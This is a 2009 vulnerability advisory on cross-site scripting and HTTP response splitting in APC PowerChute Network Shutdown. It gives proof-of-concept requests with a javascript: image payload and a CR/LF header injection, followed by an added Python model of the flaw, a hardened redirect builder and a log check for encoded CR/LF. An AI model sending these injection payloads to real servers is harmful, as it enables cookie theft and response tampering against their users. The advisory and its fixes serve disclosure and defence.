APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting

Vulnerability ID 1057494 Vulnerability type
Published 2009-02-26 Updated 2009-02-26
Platform Java CVSS score N/A
source: http://www.securityfocus.com/bid/33924/info

APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. 

1. XSS

GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')">

2. Response Splitting Vulnerability found in script contexthelp.

Vulnerable parameter - "page"

Example
*******

GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0

response:

HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 Сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html
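The following is an added example and is not code from the advisory, from DSECRG, or from APC. It models why a CR/LF sequence in the "page" parameter splits the 302 response shown above (the decoded value is concatenated straight into the Location header, so the browser sees an extra "DSECRG_HEADER" line), shows a hardened redirect builder that rejects control characters and restricts the value to a plain page name, and adds a small access-log check that flags percent-encoded CR/LF in a query string. The function names, the response skeleton and the sample request lines are constructed for the example.

```python
"""Added example (not from the advisory or from APC): demonstrates the HTTP
response-splitting mechanism behind the /contexthelp "page" parameter,
a hardened replacement, and a log-side detection check.  All names and
sample inputs here are constructed for illustration."""
import re
from urllib.parse import quote, unquote

# Characters that must never reach an HTTP header value: CR, LF, NUL.
_HEADER_CTRL = re.compile(r"[\r\n\x00]")


def unsafe_location(page: str) -> str:
    """Mirrors the flawed behaviour the advisory describes: the decoded
    user value is concatenated into the Location header unchanged."""
    return "Location: help/english/" + page


def safe_location(page: str) -> str:
    """Hardened variant (assumption: help pages are simple file names).
    Rejects CR/LF/NUL and any value that is not a plain page name, then
    percent-encodes what remains before it is placed in the header."""
    if _HEADER_CTRL.search(page):
        raise ValueError("control character in redirect target")
    if not re.fullmatch(r"[A-Za-z0-9_.-]+", page):
        raise ValueError("redirect target is not a simple page name")
    return "Location: help/english/" + quote(page, safe="")


def build_response(location_line: str) -> str:
    """Assemble a minimal 302 response around the given Location line,
    shaped like the vulnerable server's output quoted in the advisory."""
    return (
        "HTTP/1.0 302 Moved temporarily\r\n"
        "Content-Length: 0\r\n"
        + location_line + "\r\n"
        "Content-type: text/html\r\n"
        "\r\n"
    )


def parse_headers(raw: str) -> dict:
    """Parse the header block of a raw response into a dict (last value
    wins), which is roughly how a browser or proxy reads an injected line."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def headers_for(page_param: str, hardened: bool) -> dict:
    """Decode the query value as the server would, build the 302 response
    with the unsafe or the hardened Location builder, and parse it back."""
    page = unquote(page_param)
    line = safe_location(page) if hardened else unsafe_location(page)
    return parse_headers(build_response(line))


# Log-side detection: a raw or percent-encoded CR/LF inside a query string
# is the signature of a response-splitting attempt against a redirect.
_CRLF_IN_QUERY = re.compile(r"%0[dD]|%0[aA]|[\r\n]")


def flags_crlf_attempt(request_line: str) -> bool:
    """True if the request target (second token of an access-log request
    line such as 'GET /path?q=... HTTP/1.0') carries CR/LF in any form."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    query = parts[1].partition("?")[2]
    return bool(_CRLF_IN_QUERY.search(query))


if __name__ == "__main__":
    # Constructed input mirroring the advisory's proof-of-concept value.
    poc = "Foobar?%0d%0aDSECRG_HEADER:testvalue"
    print(headers_for(poc, hardened=False))   # DSECRG_HEADER appears as a header
    try:
        headers_for(poc, hardened=True)
    except ValueError as err:
        print("rejected:", err)
    print(flags_crlf_attempt("GET /contexthelp?page=" + poc + " HTTP/1.0"))
```

The unsafe path reproduces exactly what the quoted response shows: the Location value stops at "Foobar?" and the remainder becomes a separate header. The hardened builder fails closed on any control character rather than trying to strip it, and the allowlist on the page name also removes the "?" that the original value carried, which is the right default for a parameter that only ever names a help file.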